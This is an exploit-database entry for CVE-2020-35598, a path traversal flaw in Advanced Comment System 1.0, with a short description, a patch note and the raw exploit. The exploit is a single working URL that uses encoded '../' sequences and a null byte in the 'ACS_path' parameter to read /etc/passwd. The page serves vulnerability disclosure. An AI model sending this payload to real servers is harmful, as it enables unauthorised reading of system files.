header-logo
Suggest Exploit
vendor:
Advanced Comment System
by:
Francisco Javier Santiago Vázquez aka 'n0ipr0cs'
7.5
CVSS
HIGH
Path Traversal
22
CWE
Product Name: Advanced Comment System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: CVE-2020-35598
CPE: a:advanced_comment_system:acs
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2020

Advanced Comment System 1.0 – ‘ACS_path’ Path Traversal

A path traversal vulnerability in Advanced Comment System (ACS) v1.0 allows an attacker to read arbitrary files on the server by sending a specially crafted HTTP request containing directory traversal sequences (e.g. '../../../etc/passwd') in the 'ACS_path' parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of ACS.
Source

Exploit-DB raw data:

# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal
# Date: Fri, 11 Dec 2020
# Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs"
# Vendor Homepage: Advanced Comment System - ACS
# Version: v1.0
# CVE: CVE-2020-35598

http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00